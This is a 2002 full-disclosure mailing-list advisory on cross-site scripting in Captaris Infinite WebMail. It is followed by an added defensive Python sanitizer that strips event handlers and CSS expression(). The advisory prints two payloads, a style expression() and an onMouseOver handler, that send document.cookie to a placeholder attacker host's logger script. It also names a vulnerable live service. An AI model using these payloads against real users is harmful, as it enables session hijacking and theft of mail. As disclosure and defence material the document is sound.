[Full-Disclosure] Captaris (Infinite) WebMail XSS

From: Pedram Amini (pedramat_private)
Date: Mon Dec 16 2002 - 15:23:10 PST


    I figured it was about time I hopped on the XSS band-wagon.
    
    The Captaris (www.captaris.com) Infinite WebMail application is vulnerable to
    Cross-Site Scripting (XSS) attacks. The application fails to filter the
    following tags, both of which can be used to redirect a user to an attack script:
    
    Launch on e-mail open:
        <p style="left:expression(document.location=
        'http://attackers.server/cgi-bin/logger.cgi?'
        +document.cookie)">
    
    Launch on mouse over:
        <b onMouseOver= "document.location=
        'http://attackers.server/cgi-bin/logger.cgi?'
        +document.cookie\">
    
    I am sure there are other XSS attack methods that can also be utilized to
    bypass their basic filtering.
    
    A sample vulnerable service is provided by dog.com (www.dogmail.com); they
    are running WebMail v3.61.05. A sample cookie and mail logger script that
    will retrieve all of the messages in the user's main mailbox has been
    attached, and can also be found at
    http://pedram.redhive.com/advisories/dogmail.cgi
    
    -pedram
    http://pedram.redhive.com
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    
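An added example, not part of the post above or of any Captaris code: a small allowlist sanitizer for HTML mail bodies that neutralises both vectors the post describes, inline event-handler attributes (onMouseOver) and CSS expression() inside a style attribute, by rebuilding the markup from parsed tokens instead of blocklisting tags, and records what it dropped so the attempt can be logged. All names and the sample inputs are constructed for this example.

```python
"""Allowlist sanitizer for HTML mail (added example, hypothetical names)."""
from html import escape
from html.parser import HTMLParser
import re

ALLOWED_TAGS = {"p", "b", "i", "u", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}, "p": {"style"}}
# CSS expression() and javascript: are the script-bearing values to refuse.
_UNSAFE_VALUE = re.compile(r"expression\s*\(|javascript\s*:", re.I)
_SAFE_HREF = re.compile(r"^(https?:|mailto:)", re.I)


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # (tag, attr, value) removed; feed this to logging

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown element: emit nothing, its text still passes
        kept = []
        for name, value in attrs:  # HTMLParser lower-cases names for us
            value = value or ""
            if (name.startswith("on")
                    or name not in ALLOWED_ATTRS.get(tag, set())
                    or (name == "style" and _UNSAFE_VALUE.search(value))
                    or (name == "href" and not _SAFE_HREF.match(value))):
                self.dropped.append((tag, name, value))
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is always re-escaped


def sanitize(html):
    """Return (clean_html, dropped_attributes) for one mail body."""
    s = MailSanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped
```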



    This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 16:11:08 PST